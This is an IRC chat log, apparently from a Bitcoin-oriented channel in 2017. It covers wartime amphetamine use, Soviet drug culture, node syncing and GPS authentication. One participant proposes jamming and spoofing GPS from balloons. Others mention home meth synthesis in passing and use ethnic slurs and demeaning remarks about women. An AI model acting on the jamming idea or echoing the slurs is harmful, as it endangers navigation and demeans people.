< check out the bottomost answer he gave, also 1744474;1511990135;asciilifeform;!~ticker --market all 1744475;1511990142;jhvh1;asciilifeform: Bitstamp BTCUSD last: 9795.0, vol: 29252.59358784 | Bitfinex BTCUSD last: 9674.3, vol: 165051.96008665 | Kraken BTCUSD last: 9670.0, vol: 9102.32817399 | Volume-weighted last average: 9691.46583039 1744476;1511990151;asciilifeform;lol fire extinguisher hastily fired 1744477;1511990235;gabriel_laddel;and finally: https://www.quora.com/Why-are-people-who-use-meth-called-tweakers 1744478;1511990270;asciilifeform;'If you start to change a lightbulb, then spend seven hours deconstructing and re-constructing the elaborate Moroccan light fixture in the kitchen, rearranging the stained glass so that the colors point in the right directions, shining it up inside and out, running to the store for better bulbs, threading the cord so that it lands in an inconspicuous position, you've just tweaked. ' 1744479;1511990314;asciilifeform;http://btcbase.org/log/2014-08-25#808005 << see also thread 1744480;1511990314;a111;Logged on 2014-08-25 03:08 asciilifeform: busy as a bee << funny that they show an idiot sow scrubbing, and not, e.g, paul erdos crapping out theorems 1744481;1511990326;asciilifeform;i'm still waiting for gabriel_laddel's theorem tho 1744482;1511990399;gabriel_laddel;welcome to the club 1744483;1511990952;*;gabriel_laddel finds the story of Puyi totally insane 1744484;1511991421;asciilifeform;gabriel_laddel: elaborate ? 1744485;1511991663;asciilifeform;!!up gabriel_laddel 1744486;1511991664;deedbot;gabriel_laddel voiced for 30 minutes. 1744487;1511991903;asciilifeform;http://btcbase.org/log/2017-11-29#1744464 << readily available during ~all of ww2. consider reading about how this went, gabriel_laddel 1744488;1511991903;a111;Logged on 2017-11-29 21:11 gabriel_laddel: n idea, or some form of sensory input bodily electrical resonance. MP's 'women are only useful as slaves' comes to mind. Are men only useful when tweaking? 'Bennies' were readily available at Los Alamos during MP. Did no-sleep-drive-and-read-johnny use? I can't find primary sources and am also digressing... Tweaking. Something WILL grab your intere 1744489;1511991913;asciilifeform;in particular at the front. 1744490;1511991959;gabriel_laddel;Well for one, awfully interesting comparison - to a chinaman!? Completely out of the blue (yellow?). That his eunuchs did anything at all continues to be surprising to me, thought I guess floggings are useful motivation when you've no sexual drive? 1744491;1511991995;gabriel_laddel;Nothing in particular that I can say "aha! crazy!" as the whole story is totally alien 1744492;1511992004;asciilifeform;which in particular 1744493;1511992098;gabriel_laddel; http://btcbase.org/log/2017-11-29#1744138 <> https://en.wikipedia.org/wiki/Puyi#Biography 1744494;1511992098;a111;Logged on 2017-11-29 15:07 mircea_popescu: also managed to misplace a 2ct diamond i used to wear in mah lapel... utter puyi operation i'm running over here. 1744495;1511992129;asciilifeform;puyi famously got cleaned out, 'palace uh.. burned down, uhyea' sort of thing 1744496;1511992202;asciilifeform;tho for a deposed emperor and quisling figurehead ( ceremonially crowned by invading jp ) he ended not so badly -- in communist nomenklatura when he finally died 1744497;1511992243;asciilifeform;( from a mircea_popescuine pov -- ended badly, had approx same amt of agency as typical crack whore ) 1744498;1511992257;asciilifeform;!#s puyi 1744499;1511992258;a111;5 results for "puyi", http://btcbase.org/log-search?q=puyi 1744500;1511992265;asciilifeform;hm could've sworn there was moar. 1744501;1511992268;asciilifeform;!#s pu yi 1744502;1511992269;a111;3 results for "pu yi", http://btcbase.org/log-search?q=pu%20yi 1744503;1511992276;gabriel_laddel;asciilifeform do you have a book recommendation for use of amphetamines in ww2? I looked a few times and nothing caught my interest 1744504;1511992304;asciilifeform;try in german, japanese literature 1744505;1511992309;asciilifeform;e.g. 'pervitin', 'shabu' 1744506;1511992330;asciilifeform;it was imperial jp that first put meth into mass production 1744507;1511992352;asciilifeform;banzai! 1744508;1511992434;asciilifeform;for pre-history -- edeleanu (romania!) 1744509;1511992460;gabriel_laddel;My interest, incidentally is what OTC d-amph looks like on societal level. The yanks had racemic amph, Erdos had that + ritilan. Japs & Germans had meth. Nobody has had a d-amph free-for-all afaict. 1744510;1511992468;asciilifeform;britain 1744511;1511992471;asciilifeform;and for a while usa. 1744512;1511992483;asciilifeform;at one time su also, but didn't really catch on 1744513;1511992495;asciilifeform;( it was tried repeatedly as... antidepressant, in su ) 1744514;1511992664;asciilifeform;for some reason i thought laevo-isomer has 0 effect on nervous system -- e.g. laevo-meth is sold in every pharmacy in usa, as a nasal decongestant 1744515;1511992710;trinque;I would like to know which masters used these and succeeded? 1744516;1511992728;trinque;heard only so far uses for drugged slaves 1744517;1511992740;asciilifeform;plenty of kamikazes... succeeded 1744518;1511992754;trinque;these are not slaves in your book? 1744519;1511992767;asciilifeform;but on top of this, no shortage of soldiers came home , hard to say if 'with help of' or 'in spite of' whatever dopes they ate 1744520;1511992777;asciilifeform;slaves. 1744521;1511992786;gabriel_laddel;Matter... matters. If you have leftover reagents you might get what is known as "shooter's dope". Got extra l-isomer for meth? Biker crank. Phosphorous? Pink champagne. 1744522;1511992788;asciilifeform;the 1 crowned head who ate meth, famously did not end well 1744523;1511992806;trinque;perhaps g_l finds slavery appealing, and ought to accept the fact 1744524;1511992828;asciilifeform;http://btcbase.org/log/2015-02-22#1028014 << e.g 1744525;1511992828;a111;Logged on 2015-02-22 01:26 mircea_popescu: wer sind sie eigentlich, dass sie einen befehl, den ich gebe, zu missachten wagen!!??!?!!!?! etc 1744526;1511992846;gabriel_laddel;Kansas 'annie' from the 90s was supposedly far more powerful than the crystal available today because of the "dirty leftover reagents". 1744527;1511992901;asciilifeform;gabriel_laddel: if so, why no one isolated the contaminant and sold as own dope ? 1744528;1511992910;asciilifeform;if subj was 'far more powerful' 1744529;1511992920;gabriel_laddel;see adderal vs. dexedrine. 1744530;1511992985;gabriel_laddel;the cartels are not sophisticated enough to read the logs & go "hey, if there is enough variation in alcohols for one of the world's most wealthy men to comment on them, perhaps also for our product" 1744531;1511992994;asciilifeform;do dope folx not ever bother to run through a column or wat 1744532;1511993048;asciilifeform;this is eerily reminiscent of asciilifeform's kvm thread 1744533;1511993066;gabriel_laddel;asciilifeform people end up in jail, the people who do "annie" typically are not the guys running an assay on it, etc. etc. 1744534;1511993078;asciilifeform;i.e. is it possible that gabriel_laddel wanted a dope for theorems, but what there is on the market is there so that derps can http://btcbase.org/log/2017-11-29#1744462 etc 1744535;1511993078;a111;Logged on 2017-11-29 21:11 gabriel_laddel: rable' it is simply has no academic interests & probably spends most of their time seeking or finding sexual release (ie #tweaker nation tumblr females. Notice, very few post about meth and the read much closer to 'Ive no purpose, need to reproduce, NOW. What you like meth? OKAYSUREWHATEVERMETOOJUSTFUCKMEALREADY'). The catch however is that you've 1744536;1511993107;trinque;gabriel_laddel: http://btcbase.org/log/2015-05-05#1121652 1744537;1511993107;a111;Logged on 2015-05-05 22:39 mircea_popescu: http://log.bitcoin-assets.com/?date=05-05-2015#1121502 << you have to understand something essential about drugs : they aren't products. this in the sense that their flux isn't pull, it's push (which is why the sellers are called pushers). so no, the mexican economy does not rely on others buying drugs anymore than britain's economy relied on chinese buying opium. 1744538;1511993118;asciilifeform;i thought jail was required 'university' for dope people, like actual university used to be for maths 1744539;1511993157;gabriel_laddel;trinque: dude whatever I heard drugs existed and sought them out by iterating through every human I could find. 1744540;1511993180;trinque;asciilifeform: you're really getting something out of this? 1744541;1511993207;gabriel_laddel;some people learn about sex and go MEMEMEMEMEMEMEMEMME. Some people hear about sports and find it appeals to them. there is a wide variation in genetics & environments. 1744542;1511993211;trinque;go fly and see him, watch him smoke the stuff. can transcribe the theorems coming out of his ears. 1744543;1511993211;asciilifeform;trinque: i'll admit that i dun really buy the 'pushing' angle. if anything it's the mcdonaldizers and walmartizers, star topology creators, who create the demand for opiums 1744544;1511993276;gabriel_laddel;Uncle Al: ~"I had IV drip of morphine for 3 months. opiates are boring pharma" 1744545;1511993290;asciilifeform;trinque has a point, a byte in the l0gz is not cheap ! 1744546;1511993346;asciilifeform;gabriel_laddel: i recommend to take a break and come back when you have theorem, or at least something new. and use some of your artificial stamina to make a blog, and write. 1744547;1511993407;asciilifeform;gabriel_laddel: understand also that yer overclocking yer meat, and it will have eventually to be paid for. 1744548;1511993420;asciilifeform;with interest. 1744549;1511993471;asciilifeform;eventually you will take the pill and nothing useful will happen. 1744550;1511993662;asciilifeform;woah d00d actually did as he was told, for 1ce. 1744551;1511993932;asciilifeform;btw there is a famous 1990s ru b00k on subj of gabriel_laddel, http://btcbase.org/log/2014-02-27#536165 . ( summary : at one time ephedrine was sold openly, in 1980s su , for asthmatics. and student culture of methism developed, folx would buy the feedstock, do the reaction in glass taken home from school/work ) 1744552;1511993932;a111;Logged on 2014-02-27 18:54 asciilifeform: mircea_popescu: famous autobio. take on the subject, 'Низший Пилотаж' (http://lib.ru/ZHURNAL/pilotazh.txt) 1744553;1511993993;asciilifeform;the 'krokodilists' are superficially similar but different in that typically someone ~else~ , in meatwot, cooks the ersatz dope for them 1744554;1511997787;asciilifeform;( also not sure how comparable is the psychology of krokodilism, which is a form of morphinism, to gabriel_laddeling. ) 1744555;1512000278;TomServo;http://btcbase.org/log/2017-11-29#1744216 << ditto 1744556;1512000278;a111;Logged on 2017-11-29 18:08 BingoBoingo: this is a ssd box, on very reasonable fiber, no less. << I am very glad/sad that asciilifeform's sync from wild experiments are concordant with my own 1744557;1512000333;TomServo;Closing in.. 482269, average 8-9 blks/quarter hour. 1744558;1512000537;BingoBoingo;!~bcstats 1744559;1512000538;jhvh1;BingoBoingo: Current Blocks: 496764 | Current Difficulty: 1.347001430558E12 | Next Difficulty At Block: 497951 | Next Difficulty In: 1187 blocks | Next Difficulty In About: 6 days, 20 hours, 16 minutes, and 29 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None 1744560;1512001233;TomServo;I was under the impression that using -connect $tsmr.node.ip -nolisten would be a faster sync, but seems a bit faster without. 1744561;1512001279;TomServo;Most of my sync was from deedbot, but I would frequently get blackholed? No blocks for hours, wouldn never resume on it's own, had to restart. 1744562;1512002001;ben_vulpes;TomServo: you're wholly dependent on that node's willingness to send you blocks. it may be blackholed, not in the mood, etc 1744563;1512002140;deedbot;http://www.contravex.com/2017/11/29/unpopular-ideas-about-blockchains-by-sunny-aggarwal-and-nate-rush-adnotated/ << Contravex: A blog by Pete Dushenski - Unpopular Ideas about Blockchains by Sunny Aggarwal and Nate Rush, adnotated. 1744564;1512003005;BingoBoingo;lol: "His office was in a secluded space, and he had a button under his desk that allowed him to lock his door from the inside without getting up. This afforded him the assurance of privacy. It allowed him to welcome female employees and initiate inappropriate contact while knowing nobody could walk in on him, according to two women who were sexually harassed by Lauer." http://variety.com/2017/biz/news/matt-lauer-accused-sexual-harassmen 1744565;1512003005;BingoBoingo;t-multiple-women-1202625959/ 1744566;1512006686;mircea_popescu;http://btcbase.org/log/2017-11-29#1744279 << cali stuff. 1744567;1512006686;a111;Logged on 2017-11-29 18:33 trinque: what's the point of putting a company pitch in a cover letter for another job? 1744568;1512006690;mircea_popescu;it makes sense to them. 1744569;1512008255;mircea_popescu;http://btcbase.org/log/2017-11-29#1744358 <<< this is actually a remarkably effectual approach. 1744570;1512008255;a111;Logged on 2017-11-29 18:57 BingoBoingo: but beyond that, I was applying to accelerators with this company because I don't want a real job << Sometime at a "real job" would be good for you. Work at BingoBoingo store, call it "field research" if that makes Brian in the head feel better. Show up, bust your ass, eat shit, THEN ask yourself "Why wasn't I working this hard for myself before?" 1744571;1512008426;mircea_popescu;http://btcbase.org/log/2017-11-29#1744393 << i think i knew hundreds. widely abused in post-soviet medical system, for instance ; at some point a whole surgical section was losing it at the same time, one step away from ending up discussed in the national security council. 1744572;1512008426;a111;Logged on 2017-11-29 19:06 BingoBoingo has only met one "clean productivity mether" who tried the recovery thing. Bounced in/out and then allegedly a heated argument did in his cardiovascular system 1744573;1512008884;mircea_popescu;http://btcbase.org/log/2017-11-29#1744415 << why ? best cheating ever, PRETEND like you managed to quit what you never did in thefirst place. 1744574;1512008884;a111;Logged on 2017-11-29 19:15 asciilifeform: dun i gotta take to drink 1st, and then quit..? 1744575;1512008887;mircea_popescu;insta ego boost. 1744576;1512008926;asciilifeform;lol! 1744577;1512009065;asciilifeform;mircea_popescu: gotta wonder, what was the meth doing in the surgical stockpile 1744578;1512009076;asciilifeform;war surplus ? 1744579;1512009097;mircea_popescu;back in those days, you couldn't be a doctor if you couldn't make your own. just not possible. 1744580;1512009111;asciilifeform;ah the ephedrine route 1744581;1512009121;mircea_popescu;understand, hospitals still had whole floors for labs, with bunsen burners, cut-and-seal your own tubes etc. 1744582;1512009151;asciilifeform;asciilifeform’s mother worked in one. so i saw. 1744583;1512009160;mircea_popescu;people routinely ran out of / couldn't afford the western reagents, ended up doing 1800s glucose tests for urin and so on. 1744584;1512009168;mircea_popescu;it was the best of times in being the worst of times. 1744585;1512009245;mircea_popescu;(flemming method, for teh curious) 1744586;1512009336;asciilifeform;obsolete or not, is iffy q in medicine, pneumothoracic method for tb is making a comeback 1744587;1512009337;mircea_popescu;asciilifeform also, i think i mentioned this, but in any case : 4yo me was prescribed codeine as phosphoric salt for kiddy cough. double dose what chet got for back pain. 1744588;1512009346;asciilifeform;on acct of antibiotic resistance 1744589;1512009351;mircea_popescu;aha. 1744590;1512009356;asciilifeform;mircea_popescu: metoo 1744591;1512009367;asciilifeform;codeine by the glass, nearly 1744592;1512009372;mircea_popescu;i think codeine was at the time available by the kg 1744593;1512009373;mircea_popescu;exactly. 1744594;1512009388;asciilifeform;somehow did not grow up a morphinist, either of us 1744595;1512009397;mircea_popescu;being cheap to make and "hey, at least not morphine" 1744596;1512009403;asciilifeform;aha 1744597;1512009496;mircea_popescu;generally substance abuse in post soviet world would curl the contemporaneous mind. cluj tribunal, three levesl, maybe say 50k sq foot of floor space, a thousand or two (mostly women) working there had A TRUCK. i don't mean a van. i mean a semi. 1744598;1512009508;mircea_popescu;every morning delivered ciggarettes to the local outlets. 1744599;1512009515;mircea_popescu;those chicks did 2-3 packs a day, each day, each one. 1744600;1512009525;mircea_popescu;the walls were not simply black, it fell off as a dust. 1744601;1512009535;asciilifeform;( tb method earlier is the one where you pierce and deflate a lung, naturally 1 at a time, to nuke the aerobe microbe. as a kid asciilifeform dug up his grandfather’s set from the war, thought it was diving gear ) 1744602;1512009572;mircea_popescu;that shit even works, other than the collapsible lung sechellae etc. but it will kill it. 1744603;1512009597;asciilifeform;and, importantly, works on resistant tb 1744604;1512009607;mircea_popescu;indeed. 1744605;1512009642;asciilifeform;and we had the phages thread. 1744606;1512009674;asciilifeform;all kinds of supposed ‘obsoletes’ are comin’ back, when time comes. 1744607;1512009681;asciilifeform;brb,tea 1744608;1512009699;mircea_popescu;yeah but i mean glucose ffs. approachable with "my first spectrometry kit" even 1744609;1512009746;mircea_popescu;http://btcbase.org/log/2017-11-29#1744460 << "aveti putintica rabdare!!!" 1744610;1512009746;a111;Logged on 2017-11-29 21:11 asciilifeform: gabriel_laddel: have some patience, ffs, post things in-chan 1744611;1512009875;mircea_popescu;http://btcbase.org/log/2017-11-29#1744464 << sauce ? 1744612;1512009875;a111;Logged on 2017-11-29 21:11 gabriel_laddel: n idea, or some form of sensory input bodily electrical resonance. MP's 'women are only useful as slaves' comes to mind. Are men only useful when tweaking? 'Bennies' were readily available at Los Alamos during MP. Did no-sleep-drive-and-read-johnny use? I can't find primary sources and am also digressing... Tweaking. Something WILL grab your intere 1744613;1512010476;mircea_popescu;http://btcbase.org/log/2017-11-29#1744495 << yes, it was a sarcastic reference to "they stole the stones right out of the empress' marrying diadem the same day the marriage took place". 1744614;1512010476;a111;Logged on 2017-11-29 21:48 asciilifeform: puyi famously got cleaned out, 'palace uh.. burned down, uhyea' sort of thing 1744615;1512010607;mircea_popescu;http://btcbase.org/log/2017-11-29#1744508 << the problem with amphetamine in ww1 (which is what that was), then confirmed in ww2, is that it is actually a disadvantageous tradeoff. the fundamental problem of mammals, which includes humans, is that yes they can charge, but they are ridiculously vulnerable after having charged. this has shaped the face of war, is the principal underlying engine of war, and so on. in ~general~ t 1744616;1512010607;a111;Logged on 2017-11-29 21:53 asciilifeform: for pre-history -- edeleanu (romania!) 1744617;1512010607;mircea_popescu;he positive results from a successful charge do not come close to the potential negative results of your exhausted troop being attacked. 1744618;1512010614;mircea_popescu;this is why reserves are a thing, for instance. 1744619;1512010641;mircea_popescu;it is also why methamphetamine is not actulaly militarily useful : it aggravates instead of balancing out a natural disadvantage. 1744620;1512010666;mircea_popescu;works, so to speak, like a rocket tied to a formula 1 car. those items need more thrust like i need more nose ; they need more adherence is what they need, and rocket dun help that. 1744621;1512010821;mircea_popescu;http://btcbase.org/log/2017-11-29#1744518 << moar like a knight, i guess. 1744622;1512010821;a111;Logged on 2017-11-29 21:59 trinque: these are not slaves in your book? 1744623;1512010946;mircea_popescu;http://btcbase.org/log/2017-11-29#1744527 << the theory was as of some obscure synergy. quite possibly urban legend. 1744624;1512010946;a111;Logged on 2017-11-29 22:01 asciilifeform: gabriel_laddel: if so, why no one isolated the contaminant and sold as own dope ? 1744625;1512010987;mircea_popescu;http://btcbase.org/log/2017-11-29#1744530 << note that the alcohol discussion is re taste. they all get you drunk. (arguably not the same drunk, i guess, but anyway) 1744626;1512010987;a111;Logged on 2017-11-29 22:03 gabriel_laddel: the cartels are not sophisticated enough to read the logs & go "hey, if there is enough variation in alcohols for one of the world's most wealthy men to comment on them, perhaps also for our product" 1744627;1512011171;lobbes;in other lulz from the past that are even lulzier now: http://btcbase.org/log/?date=15-07-2014#756534 1744628;1512011472;mircea_popescu;lol. 1744629;1512011474;mircea_popescu;10mn prius 1744630;1512011754;mircea_popescu;http://btcbase.org/log/2017-11-29#1744554 << afaik it's mostly siberian subsistence hunters, ie a sorta chucka. 1744631;1512011754;a111;Logged on 2017-11-29 23:23 asciilifeform: ( also not sure how comparable is the psychology of krokodilism, which is a form of morphinism, to gabriel_laddeling. ) 1744632;1512013499;lobbes;I'm pleased to at least report my archive-to-zip engine is functional. I have zipped some 1300 links so far leading back to Nov 8. All routing through archive.is without exception 1744633;1512013506;lobbes;~93% of the urls passing through both #trilema/#eulora in this time have been 'archivable' through archive.is; failures account for what you'd expect: typos in url, tar.gz files, misc. webpages that archive.is evidently barfs on 1744634;1512013517;lobbes;historical log-walk is next in the conveyor. still thinking through the distribution system. 1744635;1512014458;asciilifeform;http://btcbase.org/log/2017-11-30#1744615 << which army issued it in ww1 ?? 1744636;1512014458;a111;Logged on 2017-11-30 02:56 mircea_popescu: http://btcbase.org/log/2017-11-29#1744508 << the problem with amphetamine in ww1 (which is what that was), then confirmed in ww2, is that it is actually a disadvantageous tradeoff. the fundamental problem of mammals, which includes humans, is that yes they can charge, but they are ridiculously vulnerable after having charged. this has shaped the face of war, is the principal underlying engine of war, and so on. in ~general~ t 1744637;1512014479;asciilifeform;afaik mass production didn't start until '30s 1744638;1512014492;asciilifeform;possibly was cocaine in ww1 ? 1744639;1512014598;asciilifeform;lobbes: pretty neat 1744640;1512014720;asciilifeform;http://btcbase.org/log/2017-11-30#1744619 << jp army found the natural and obvious application. 1744641;1512014720;a111;Logged on 2017-11-30 02:57 mircea_popescu: it is also why methamphetamine is not actulaly militarily useful : it aggravates instead of balancing out a natural disadvantage. 1744642;1512014747;asciilifeform;( not everybody needs an 'after'... ) 1744643;1512016770;BingoBoingo;http://btcbase.org/log/2017-11-30#1744569 << Aha, yes. Also works when you have people outside your anthropology lab to bounce things off of that won't eat your bullshit 1744644;1512016770;a111;Logged on 2017-11-30 02:17 mircea_popescu: http://btcbase.org/log/2017-11-29#1744358 <<< this is actually a remarkably effectual approach. 1744645;1512021469;BingoBoingo;https://sofrep.com/94786/careerism-cronyism-malfeasance-special-warfare-center-end-special-forces-capability/ 1744646;1512021495;BingoBoingo;"In the last 24 months, Commanders and/or Sergeants Major at the Group and SWCS level have systematically removed numerous fundamental SF standards, lowered and undermined the grading metrics for others, all while simultaneously ensuring that a gagged cadre population was expressly prohibited from holding students accountable for their academic, physical, and character performance." 1744647;1512050565;mats;http://phasenoise.livejournal.com/2017/11/3185.html via hn 1744648;1512050579;mats;also, asciilifeform finally made the front page this morn 1744649;1512050759;asciilifeform;mats: this might explain the flood of fresh liquishit in the comments just nao. 1744650;1512053644;mircea_popescu;BingoBoingo o check it out, usg self-anticorruption squad ?! 1744651;1512054009;mircea_popescu;lobbes o wow. wd! 1744652;1512054292;mircea_popescu;asciilifeform amphetamine (generally not very pure, and more or less racemic) was used to treat depression in the us from about the 30s. it was also used indiscriminately along with blessed chamrs/amulets and eg pink pills by soldiers. 1744653;1512054300;mircea_popescu;no systematic effort by the army itself to issue it, sure. 1744654;1512055096;mircea_popescu;lmao alf got 50 comments from idiots. hang it there alfie, this isn't any kind of basis for judging blog. hackertards are just trying to drive wedge between man and man's tools. 1744655;1512055569;asciilifeform;mircea_popescu: this is the ~only type of comment i historically get. it's a snoar. 1744656;1512055588;mircea_popescu;do not despair! 1744657;1512055591;asciilifeform;every so often somebody linkes from hn, reddit, etc ( and here i was thinking 'aaah, finally permabanned' ! ) 1744658;1512056413;deedbot;http://trilema.com/2017/color-revolutions-green-or-today-in-usg-corruption-careerism-cronyism-and-malfeasance-in-the-special-warfare-center/ << Trilema - Color revolutions (green), or today in USG corruption : Careerism, cronyism and malfeasance in the Special Warfare Center 1744659;1512056667;*;mircea_popescu gloats at just how fucking convenient everything about that piece is. 1744660;1512056797;asciilifeform;holy FUQ the kvm thread... 1744661;1512056802;asciilifeform;so many of'em. 1744662;1512057471;asciilifeform;'o CPT Jimenez, currently in 7th Group, was the single source of several 4th Battalion investigations. He wrote anonymous emails, started IG complaints, or propagated rumors about virtually every single phase of the SFQC. His continual fabrications were verifiably false, and his numerous accusations resulted in several investigations that hampered operations for over a dozen cadre and battalion leadership. Literally every accusation 1744663;1512057471;asciilifeform;he levied was proven inaccurate or untrue. But as a student, he was given complete top cover and left unimpeded to continue creating havoc, and was not held accountable for the numerous integrity violations he committed. He graduated with his peers.' << win. 1744664;1512057478;asciilifeform;somebody give this d00d order of red star. 1744665;1512057481;asciilifeform;and of lenin. 1744666;1512057485;mircea_popescu;heh. 1744667;1512057489;mircea_popescu;cake pic takes the cake. 1744668;1512057626;asciilifeform;reminds of : ''I was such a pure and terrifying Aryan that they even put me in a special detachment. Its mission was to find out how the Jews always knew what the S.S. was going to do next There was a leak somewhere, and we were out to stop it' He looked bitter and affronted, remembering it, even though he had been that leak. 'Was the detachment successful in its mission?' I said. 'I'm happy to say,' said Arpad, 'that fourteen S.S. m 1744669;1512057626;asciilifeform;en were shot on our recommendation. Adolf Eichmann himself congratulated us.'' (vonnegut's 'mother night' naturally) 1744670;1512057653;mircea_popescu;aha 1744671;1512057671;asciilifeform;http://wotpaste.cascadianhacker.com/pastes/Eznv2/?raw=true << whole thing, ftr. 31333337 w4r3z !111 1744672;1512058124;asciilifeform;'SPC Thomas was an 18B trainee. He was first caught attempting to bribe an instructor with beer, and then later had a panic attack during an AAR while in the 18B FTX. During his relief board counseling, he attempted to blackmail 18B cadre by telling them that if relieved and returned to his unit, he would have to annotate that he witnessed the instruction of secret/noforn course material to international students. This was a complete 1744673;1512058124;asciilifeform;ly fabricated event, and later verified as untrue via internal investigation. He then went behind his TAC’s back and, because he had a very good working relationship with his NG Group Commander, produced a memo directing his reclassification as an 18E. Despite all of these acts, he was not relieved, but was given a recycle into the 18E course. He would fail the SFPA and retest twice before being graduated.' << ahaha 1744674;1512058129;asciilifeform;whole thing pretty great. 1744675;1512058145;mircea_popescu;aha. 1744676;1512058163;mircea_popescu;amusingly, it makes a number of historical points for me. "but how could mp have known" etc. 1744677;1512058197;asciilifeform;'secret/noforn course' << last i heard , every recruit into u.s. army gets auto-seekret. and that orc mercenaries were not inducted into 'socom' to begin with. 1744678;1512058203;asciilifeform;possibly both of these have changed. 1744679;1512058386;asciilifeform;http://btcbase.org/log/2017-11-30#1744647 << the Right Thing would be 1) also jam the usg gps freqs 2) attach to 9000 strato-balloons, release wherever. 1744680;1512058386;a111;Logged on 2017-11-30 14:02 mats: http://phasenoise.livejournal.com/2017/11/3185.html via hn 1744681;1512058416;asciilifeform;make sure each operates intermittently, likewise, vs 100% dutycycle 1744682;1512058443;asciilifeform;usg navigational gear has directional antennae, largely dun care re ground-level jammers. jam from above. 1744683;1512058516;asciilifeform;also, elementarily, don't transmit random crapola, transmit signals receive from actual sats, with random delay. 1744684;1512058552;asciilifeform;( iirc we had the 'physically impossible to make cryptoauthenticable navigational or time signal, as others can receive and retransmit with delay' thread. ) 1744685;1512058566;mircea_popescu;we did. 1744686;1512058593;mircea_popescu;of course, i'm unconvinced. include counter for instance. 1744687;1512058602;asciilifeform;how does that help ? 1744688;1512058658;asciilifeform;satellite nav systems work by 'which sats do i see, and what order are the relative signal strengths'. neither is authenticable . 1744689;1512058667;mircea_popescu;"already saw 59065409405, disregarding the newer one" 1744690;1512058675;asciilifeform;this works unidirectionally . 1744691;1512058678;mircea_popescu;a yes, wouldn't work on current item. 1744692;1512058720;mircea_popescu;asciilifeform well you can't "retransmit" at a time before transmission. so yes unidirectionalyl in time. 1744693;1512058723;asciilifeform;enemy can still fuck you by getting a genuine signal from your own sat, but one which your receiver ought not legitimately to be hearing ( or hearing in the given strength ) , conveying over a fiber, and retransmitting in your loc 1744694;1512058754;mircea_popescu;asciilifeform the current way gps/glonass works is not authenticated by definition, as you correctly point out. 1744695;1512058762;asciilifeform;this in fact happens naturally in city envir, and is called 'multipath', makes the receiver output ~randomola 1744696;1512058766;mircea_popescu;but the discussion was re an authenticable alt-item that dfun exist. 1744697;1512058794;asciilifeform;not clear how it could exist at all, even with arbitrary equipment -- how do you sign ~the relative signal strengths~ 1744698;1512058800;asciilifeform;which are the actual datum in question 1744699;1512058807;mircea_popescu;you don't. here's a model : 1744700;1512058889;mircea_popescu;receiver listens to frequencies for specific quanta of transmission : "this is station X transmitting count Y", rsa-signed. IF the signature verifies, and IF the y was not before seen (and if x on unit's access list etc) THEN the item is placed into quueue, to be sorted by signal strength. otherwise, dropped as noise. 1744701;1512058908;asciilifeform;usg's gps already works on this principle iirc 1744702;1512058911;mircea_popescu;this will require MUCH more powerful sats, evidently, and a lot heavier navgear. but whatever, discussion was re possibility not feasibility. 1744703;1512058919;mircea_popescu;afaik notrly. 1744704;1512058935;asciilifeform;it doesn't help if enemy ~helps~ you pick up a (genuine) signal at higher strength than naturally ought to be seen 1744705;1512058947;mircea_popescu;it helps if you already heard it 1744706;1512058951;mircea_popescu;will discouint 2nd coming\ 1744707;1512058954;asciilifeform;correct. but not if you have not. 1744708;1512058964;mircea_popescu;if you have not you're sol. 1744709;1512058971;asciilifeform;recall that it is not physically possible to perfectly sync the clocks, either 1744710;1512058977;mircea_popescu;i recall. 1744711;1512058980;asciilifeform;either on the sats or on the ground. 1744712;1512058982;mircea_popescu;as i say, much heavier gear. 1744713;1512058991;asciilifeform;heavier and still trivially fucked in ~exactly same way 1744714;1512059001;mircea_popescu;but basically, a blockchain-gps will be the next upgraded version of gps 1744715;1512059007;mircea_popescu;possibly hwat china's already doing. 1744716;1512059018;mircea_popescu;dun seem likely the usg is capable of it atany rate. 1744717;1512059038;asciilifeform;it'll change 0 in practice, enemy can still quite easily 'pull' your, e.g., bomber, in some direction off course by amplifying your own genuine signal 1744718;1512059055;asciilifeform;you only need a very small delta for a gigantic offset 1744719;1512059067;mircea_popescu;not necessarily. but yes, small errors are major errors. 1744720;1512059094;asciilifeform;by some accounts this is how cia pulled the korean air whatever# into sov airspace ( albeit with conventional, vs sat., navigatronics ) 1744721;1512059147;mircea_popescu;in general -- if enemy can silence your emitters AND retransmit them stronger, there's no saving you. 1744722;1512059157;mircea_popescu;but mitigation si available on both lines there. 1744723;1512059161;asciilifeform;in the case of nav sats, he dun have to silence -- the signal is already quite weak 1744724;1512059170;mircea_popescu;currently. 1744725;1512059174;asciilifeform;( iirc a few 100w or so at the emitter ) 1744726;1512059175;mircea_popescu;as i said, much louder sats. 1744727;1512059201;asciilifeform;louder needs... pebble reactor ? costly. and you get moar multipath. 1744728;1512059242;mircea_popescu;not clear wtf it will need. but yes, in principle a thousand-to-million-ton satellite is warranted by the gps needs. nobody said satellite stays thinspired forever. 1744729;1512059264;asciilifeform;the ease of monkeying with radio nav, is why east and west empires both sank $maxint into terrain-trackers in '80s ( what, if anything, this came to, i have nfi ) 1744730;1512059307;mircea_popescu;~something. 1744731;1512059314;asciilifeform;mircea_popescu: recall how concept of 'space station' came about ( 'somebody gotta change the vacuum tubes!' - '50s ) 1744732;1512059319;mircea_popescu;aha! 1744733;1512059335;mircea_popescu;the problem with terrain trackers is that eg suddenly sahara becomes mega-valuable strategically. 1744734;1512059338;asciilifeform;turned out, there ain't the turkey dollars, for even quite modest station. 1744735;1512059344;mircea_popescu;for the same reason it's not fulla solar panels. 1744736;1512059358;asciilifeform;sahara, bottom of the sea, etc. 1744737;1512059374;mircea_popescu;asciilifeform depends where. i don't see china clearly enough to say. maybe they got turkeyws. 1744738;1512059391;asciilifeform;possibly if they quit building ghost towns... 1744739;1512059404;mircea_popescu;maybe that's what they're training for, with the ghost towns. 1744740;1512059444;asciilifeform;the expense of lifting mass into orbit is the real biter; orbital station is comparable to solid gold pyramid 1744741;1512059457;mircea_popescu;terrible, yeah. 1744742;1512059474;asciilifeform;hence why everyone ended up with small, 'disposable' sats. 1744743;1512059475;mircea_popescu;and especially for large item you want in one piece. 1744744;1512059480;mircea_popescu;quite. 1744745;1512059502;mircea_popescu;resistence of materials starts fucking with you rapidly. (daddy, why is there no ant larger than a toyota prius???) 1744746;1512059527;mircea_popescu;"chitin has limits, son" 1744747;1512059546;asciilifeform;ant could be considerably ( though not 'toyota' ) larger if he had lungs 1744748;1512059578;mircea_popescu;if it had lungs it'd have muscles (because current system not powerful enough and because since you got all that oxygen..). ant with lungs and muscles is called rat. 1744749;1512059587;asciilifeform;( or atmosphere -- richer in o2 -- but this is well known ) 